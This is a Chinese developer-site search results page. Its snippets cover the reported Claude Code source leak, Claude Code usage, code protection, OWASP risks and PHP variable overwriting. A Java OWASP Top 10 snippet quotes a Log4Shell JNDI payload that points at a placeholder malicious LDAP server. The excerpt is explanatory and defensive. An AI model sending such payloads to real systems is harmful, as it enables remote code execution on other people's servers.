- 综合排序
- 最热优先
- 最新优先
- 来自专栏AI技术体系搭建过程
51万行代码裸奔之夜:ClaudeCode源码深度拆解与AI规约编程研究指南
他管理的Java系统有这些典型问题:痛点一:代码腐烂,没人敢动老系统没有测试,文档早就过期。结果是:每次改一个需求,都像在地雷阵里走钢丝。 LSP集成 + 全局代码理解,Claude Code可以做到"先读懂整个代码库,再做改动"。这对遗留系统改造价值极大。痛点二:需求→代码的翻译损耗业务说"加个审批流",研发理解成了五种不同的东西。 这在微服务开发场景下,意味着可以同时修改多个服务的接口定义、测试代码和文档,而不是串行等待。 老李最后说的一句话值得反复想:"这份代码告诉我,未来最值钱的工程师不是写代码最快的,是能把业务规则、架构约束、安全边界,用AI能理解的语言精确定义出来的人。规约写得好,AI才能跑得准。" 51万行代码,Anthropic用一次配置失误,把下一代软件工程的底牌摊开了。看懂的人,现在就开始动。
3.1K172编辑于 2026-04-01 - 来自专栏陈哥聊测试
Claude Code源代码泄露,Harness Engineering是救星吗
前几天,ClaudeCode源代码泄露这件事让大家对HarnessEngineering的谈论达到了顶峰。昨天刚好和同事聊起来这件事,这次51.2万行代码因为一个打包配置失误就全部裸奔出去。 开发人员把精力都放在怎么写好提示词、怎么让AI生成更多代码,却忽略了最基本的工程规范。再往深一层想,AI能替代工程师写代码,但它能替代软件工程的核心吗? 代码写出来只是第一步,后续还有更重要的质量保障,这些都要靠人来完成,靠人把问题堵在产品上线前。这次ClaudeCode的事就是个活生生的例子。AI再强,也补不了工程能力的短板。 一个合格的工程师是在AI帮你写完代码后,你能看懂、能判断、能优化、能守住质量和安全的底线。而一个好的团队是不管用什么工具,都能守住软件工程的底线,不让51.2万行代码因为一个配置失误就全网裸奔。 说句题外话,这次事件之后,肯定会有很多公司去抄ClaudeCode的架构、抄它的提示词逻辑。
21810编辑于 2026-04-09 - 来自专栏Learn Claude Code
【从零手写 ClaudeCode:learn-claude-code 项目实战笔记】(10)Team Protocols (团队协议)
这就是s10要做的:把这种request-response模式抽象成一套通用协议,同时覆盖关机和计划审批两个场景。 在s09中,send_message就是随便发一句话:展开代码语言:TXTAI代码解释{"type":"message","from":"alice","content":"我干完了"}在s10中,协议消息多了三样东西 ,#s10新增{"name":"shutdown_response",...},#审批关机请求{"name":"plan_approval",...} s09关机vss10关机s09:直接改状态,没有通知、没有确认展开代码语言:TXTAI代码解释#一行代码搞定,但也埋下了隐患member["status"]="shutdown"s10:完整的握手流程展开代码语言 六、试一试展开代码语言:TXTAI代码解释cdlearn-claude-codepythonagents/s10_team_protocols.py试试这些prompt(英文prompt对LLM效果更好
25000编辑于 2026-03-20 用了一周 oh-my-claudecode,我对“AI写代码”的看法变了
最近折腾了一下oh-my-claudecode这个项目,说实话,一开始我是带着一点怀疑去的。 我用下来最大的变化:以前:写代码=写函数现在:写代码=写“任务描述”比如:展开代码语言:BashAI代码解释team5:executor重构数据库层它会自动:创建团队分配任务跑流程这已经不是IDE插件的范畴了 ❗3.不可控性仍然存在尤其:并发模式自循环模式有时候你会感觉:“这代码不是我写的,我不太敢上线”八、我对它的一个判断我觉得这个项目本质上不是:“提高写代码效率”而是:重新定义开发方式传统:展开代码语言: TXTAI代码解释人→写代码→AI辅助这个项目:展开代码语言:TXTAI代码解释人→下指令→AI团队写代码差别非常大。 一句话总结:会“指挥”的人,用它会很强只会“写代码”的人,会被它搞懵十、最后一句真实评价如果让我打分:创新:9/10实用:7/10稳定:6/10但有一点很确定:这东西代表的是未来,而不是现在
1.4K30编辑于 2026-04-07AI工具链效率提升——以ClaudeCode为例,从Demo代码到工程化落地
▪ 实战案例:用ClaudeCode重构Spring Boot Service 来看个真实案例。 CACHE_KEY_PREFIX = "order:list:"; private static final Duration CACHE_TTL = Duration.ofMinutes(10 7 DAY) GROUP BY o.id, u.name ORDER BY o.create_time DESC LIMIT 100; 查询次数:从301次降到1次 预计性能提升:10 ### 实战案例:ClaudeCode发现并修复性能问题 真实案例。某系统的一个接口,响应时间从100ms慢慢涨到了3s。上线后才暴露问题,用户投诉来了。 () 在循环中调用 categoryService.getByName() - 如果返回100个产品,实际执行101次数据库查询(1次产品查询 + 100次分类查询) - 响应时间 = 单次查询时间(10ms
30310编辑于 2026-04-28- 来自专栏Python疯子
别再裸奔了,你的项目代码安全吗,再不加密就out了
image 加密Python源代码的方式,是将.py文件转化为.so文件,这样加密的可靠性非常高,无法破解,也就很好地保护了源代码。 一键完成 因为我们不可能通过加密项目,然后一步步移动加密文件,然后删除,再部署项目,那样会导致整个项目代码很乱,也不方便操作 加密文件也是Python代码肯定要用code完成整个过程了, (加密 -- Docker 部署的,那么就要在部署过程中进行加密处理 那么通过Docker部署需要注意点: 1、需要安装python3-dev,gcc,Cython 2、要先安装Cython, 才能执行加密代码
2.7K30发布于 2019-11-26 - 来自专栏网络安全攻防
OWASP低代码Top 10
文章前言 低代码/无代码开发平台提供了一个通过图形用户界面创建应用软件而不是传统的手工编码计算机程序的开发环境,这种平台减少了传统手工编码的规模,从而加快了商业应用程序的交付,而随着低代码/无代码开发平台激增以及被组织广泛使用 ,产业界提出了一个明确而紧迫的需求,即建立依赖此类平台开发的应用程序相关的安全和隐私风险意识 OWASP Top 10 Low-Code/No-Code Security Risks(简称OWASP低代码十大安全风险 、软件即服务(SaaS)、平台即服务(PaaS)和云平台的跨组织堆栈上,大多数无代码/低代码平台都内置了大量连接器(即围绕API的包装器),可轻松地实现快速连接,大多数无代码/低代码平台中连接器和用户凭证形式的连接都是头等对象 ,作为数据移动的载体,无代码/低代码应用程序轻易就可以通过把数据移动到组织边界外部的另一个组织或个人账号而导致数据泄露,而当作为操作触发器,无代码/低代码应用程序可能通过将一个系 统中的操作与另一个系统中的更改隐式耦合而造成意想不到的后果 "代码"的一部分进行存储或者存储在平台提供的托管 数据库中,而这些数据必须按照法规和安全要求进行适当的存储 风险描述 无代码/低代码应用程序可以将数据作为其"代码"的一部分进行存储或者存储在平台提供的托管数据库中
1.6K20编辑于 2022-12-22 - 来自专栏奝-大周
代码审计day10
变量覆盖 变量覆盖是指变量未被初始化,我们可以自定义参数值替换程序原有的变量值 extract()变量覆盖 int extract ( $array , extract_rules,prefix ) $array 关联的数组,受第二个和第三个参数的影响 extract_rules 对待非法/ 数字和冲突的键名的方法将根据取出标记 prefix 仅在第二个参数特殊时需要,添加前缀 危险函数 EXTR_OVERWRITE-默认。如果有冲突,则覆盖已有的变量。 EXTR_SKIP- 如果有冲突,不覆盖已有的变量。
63930发布于 2020-08-19 你的 C# 代码在 dnSpy 面前就是“裸奔”:深扒 .NET 逆向危机与防御实战
一、 dnSpy:不仅是看源码,更是“上帝模式”如果你认为逆向只是“看看代码”,那你就太低估 dnSpy 了。 动态调试:攻击者可以直接在你的代码上打断点!就像你在 Visual Studio 里调试自己的代码一样,他们可以查看变量值、内存状态,甚至修改运行时数据。 dnSpy 允许直接编辑 IL 指令甚至 C# 代码并重新编译保存。 对抗效果:Sugo Protector 会将代码中的敏感字符串进行高强度加密,并在运行时动态解密。在静态分析中,攻击者只能看到一堆乱码数据,无法通过字符串搜索定位关键代码。3. 四、 守护你的知识产权,从现在开始代码裸奔的代价是巨大的:盗版泛滥、核心算法泄露、API 接口被滥用。
73910编辑于 2026-01-12一个57MB的map文件,怎么就把Anthropic的底牌全掀了?
大家好,我是摘星,今天我们来拆解一件荒诞到让人不敢相信的真事——Anthropic因为一个npm打包配置失误,把自家王牌产品ClaudeCode的全部源代码暴露在了全世界的眼皮底下。 一、事件还原:一个打包失误引发的全球代码裸奔先捋一下时间线。 展开代码语言:TXTAI代码解释graphTBsubgraph"ClaudeCode五层架构"E["入口层EntryPoints
CLI/REPL/Slash命令"]O["编排层Orchestration ClaudeCode的做法是渐进式的,给了用户重新建立信任的空间。46行代码,体现的是对用户体验的深度思考。 mapFiles.length>0){errors.push(`发现${mapFiles.length}个.map文件将被发布:\n${mapFiles.join('\n')}`);}//2.检查包大小(超过10MB20810编辑于 2026-04-07- 来自专栏掘金安东尼
10 个「有用」JavaScript 代码片段
month) {days = 31;} else if (8 == month) {days = 31;} else if (9 == month) {days = 30;} else if (10 days = 31; break; case 8: days = 31; break; case 9: days = 30; break; case 10 { const {price, quantity, name, description} = args } getItem({ name: 'bananas', price: 10
33140编辑于 2022-08-22 - 来自专栏设计模式
10段奇葩的代码注释
码个蛋(codeegg)第 609 次推文 程序员作为一种“异类”,虽然他们平时给人们的留下的印象并不太好,觉得他们只会写代码。 但是有的时候不得不佩服他们天马行空的想象力,他们可能会利用注释让你噗嗤一笑,下面我们来看看那些奇葩搞笑的代码注释吧。 1 能用代码注释画出这么形象的佛祖,看来真的是下了一番功夫。 2 能用代码去注释这么多羊,写着写着就真的该睡着了 (~﹃~)~zZ ? 3 连佛祖都因抵抗不了bug而倒在墙边,这bug该真的是无力解决了吧。 ? 4 程序员的寿命只有五岁么? 10 这个嘛,你们懂的 ? ?
95520发布于 2020-12-16 - 来自专栏大猫的R语言课堂
10行代码搞定【滚动回归】
在今天的大猫课堂中,大猫教大家用10行代码搞定它! PS:由于微信的限制,给大猫留言的小伙伴超过48小时后大猫就不能回复你们了。所以如果想联系大猫,可以按照文章最后的微信号加大猫微信哦。 步 骤分解 大猫先把代码放上来: # 设定滚动窗口期,这里为100天 n <- 100 # 计算滚动回归! 现在我们逐一分析这几行代码。 但是,这个滚动回归的代码也不是完美的,最大的劣势就在于我们的滚动窗口是用“期”而不是用“天”来定义的,也就是说,程序在每次滚动的时候都会固定找前面n期的观测,而不管这n期之间可能间隔的是10天,20天还是一个月 但是,对于大多数研究中,这种情况并不常见,所以大猫给出的代码还是能够应对大多数情况。
2.4K20发布于 2020-10-23 - 来自专栏Sign
web版《合成10》代码分享
正文 这个游戏,我提了好几次了,公众号SignACG回复『合成10』可以获取游戏链接。 前面有一篇讲『合成10』的游戏实现逻辑。 这次来直接分享代码吧。 我把代码放到github上了,阅读原文可查看,或访问这个链接 https://github.com/ccx01/get10 ? index-done.html就是完整的代码了,无注释。 实际上这个游戏的代码量并不多: ? ? 286行,比一些普通web页面的代码量还要少。但是里面的游戏逻辑却不是一个数量级的。 首先是游戏的样式: ? 接下来是游戏的逻辑代码: ---- 1、初始化 ? ? 比如这个『合成10』,如果现在的我来写的话,我可能就不会在这些代码上进行扩展了,而是重新开始从0写一份。
1.3K60发布于 2018-04-18 Claude Code在编程之外的能力
ClaudeCode:超越代码的智能革命——编程之外的九大能力重构当开发者们还在争论AI编程工具能否替代传统开发时,ClaudeCode已悄然突破代码边界,成为重构工作流、管理生活甚至重塑组织协作的超级智能体 设计民主化上传产品草图后,ClaudeCode能生成React组件代码与Figma设计稿,并自动进行响应式布局测试。某初创公司借此实现「设计师-工程师」零沟通成本协作。 三、组织效能催化剂:重构协作模式的技术哲学Anthropic内部实践显示,ClaudeCode正在重塑技术与非技术团队的协作范式:技术团队的「代码平权」数据基础设施团队通过ClaudeCode实现Kubernetes 安全团队则用其生成Terraform代码审查报告,漏洞发现率提升40%。非技术团队的「能力跃迁」增长营销团队构建「双代理工作流」:一个代理分析广告数据,另一个生成新文案,广告迭代效率提升10倍。 法律团队开发的「电话树系统」,将客户咨询响应时间缩短至10秒。跨系统智能体网络通过MCP协议,ClaudeCode可连接Jira、Slack、数据库等工具。
17110编辑于 2026-04-29Anthropic 终端神器 Claude Code 源码泄露?深度解析 18+ 核心工具架构!
1️⃣真正理解你的代码库不同于普通的AI聊天助手,ClaudeCode能够:深入理解整个项目结构跨文件分析代码逻辑精准定位问题所在2️⃣拥有真实的执行能力它不只是"建议",而是能够直接操作:读写编辑文件执行终端命令搜索代码库网络搜索和抓取 四、TypeScript类型系统设计ClaudeCode的类型系统设计非常严谨,以下是其核心类型定义:ToolInputSchemas输入类型展开代码语言:TypeScriptAI代码解释exporttypeToolInputSchemas 各种Linux发行版AlpineARM64/x64musllibc环境WindowsARM64/x64Windows10/11总计支持9个平台组合,基本覆盖所有主流开发环境! :TXTAI代码解释├──agentId:代理唯一标识├──outputFile:输出文件路径└──description:任务描述七、Vendor二进制依赖ClaudeCode内置了以下二进制工具:工具功能 audio-capture音频捕获能力ripgrep高速代码搜索引擎ripgrep是业界最快的代码搜索工具之一,搜索速度比传统grep快5-10倍!
58710编辑于 2026-04-03- 来自专栏Rust
OpenClaw用着爽翻天,但99%的人都在裸奔!10大致命安全风险 + 公有云安全部署终极指南
我亲自用Shodan扫过,短短几天就发现上千个OpenClaw实例裸奔,里面躺着API key、Telegram token、个人邮件、甚至银行相关记录。 今天直接上狠的:10大真实风险 + 对应硬核措施,最后重磅推荐公有云VPS部署(比本地Mac/Windows安全10倍+),附保姆级一键脚本。 10大致命风险 + 救命措施(直接抄作业) 1. 措施:只用ClawHub官方高星Skill,安装前让AI先review代码;禁用文件读写权限只给特定文件夹。 2. 自托管本地 = 裸奔 公有云 + V** + 最小权限 = 真香 已经上车的兄弟,评论区说说你用哪个VPS? 还没上车的,复制上面脚本,今晚就能睡个安稳觉。 别让小龙虾变成黑客的爪子。
29510编辑于 2026-04-23 Claude Code 用了1个月,我把成本压到官方价格的1/5——靠这三个方法(2026年实测)
调节(进一步减少约20–30%token消耗)上下文管理(用/compact和/new控制每次请求的token总量)每层独立有效,叠加后等效成本可以压到官方API直连的10–20%。 对于日常代码辅助任务——改bug、解释代码、简单重构、写注释——medium档的输出质量与high差异不明显,但token消耗明显更少。 在~/.claude/settings.json中加入:展开代码语言:JSONAI代码解释{"effortLevel":"medium"}实测对于普通任务,token消耗减少约20–30%。 实际使用节奏展开代码语言:TXTAI代码解释开始任务→正常对话→上下文变长时用/compact压缩→任务完成或切换新话题时用/new→新session重新开始对于长时间连续工作的ClaudeCode用户 最后一句话总结:低汇率平台+PromptCache+effortLevel调节+上下文管理,四层叠加可以把ClaudeCode的实际成本控制在官方价格的10%左右。
10400编辑于 2026-05-10- 来自专栏大数据文摘
5分钟搜索120个平台10年数据!监视软件细节曝光:人人“裸奔”,预测警务歧视严重
该公司声称,通过对120多个不同的在线平台和10年档案进行搜索,整个分析工作最快只需要短短5分钟,甚至,自动调整后还可以帮助警方测暴力和动乱。
65310发布于 2021-10-12 别让你的 Java 应用裸奔!OWASP Top10 全漏洞原理、复现与一站式防护方案
OWASP(开放式Web应用安全项目)发布的Top10榜单,是全球公认的Web应用安全风险权威指南,也是Java开发者必须掌握的安全核心知识。 一、失效的访问控制(Broken Access Control) 失效的访问控制位列OWASP Top10 2021榜首,是企业级应用最常见的安全风险。 它与代码实现缺陷不同,指的是应用在设计阶段就存在根本性的安全缺陷,即使代码写得再规范,也无法避免安全问题。 底层原理 不安全的设计的核心本质是:安全是设计出来的,不是后期补出来的。 content=${jndi:ldap://恶意服务器/恶意类},即可触发漏洞,执行任意代码,控制服务器。 底层原理 该风险的核心本质是:应用在代码、依赖、配置、数据的全生命周期中,没有做完整性校验,导致攻击者可以篡改代码、依赖、数据,植入恶意内容,最终在应用或用户端执行。
28810编辑于 2026-04-16
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号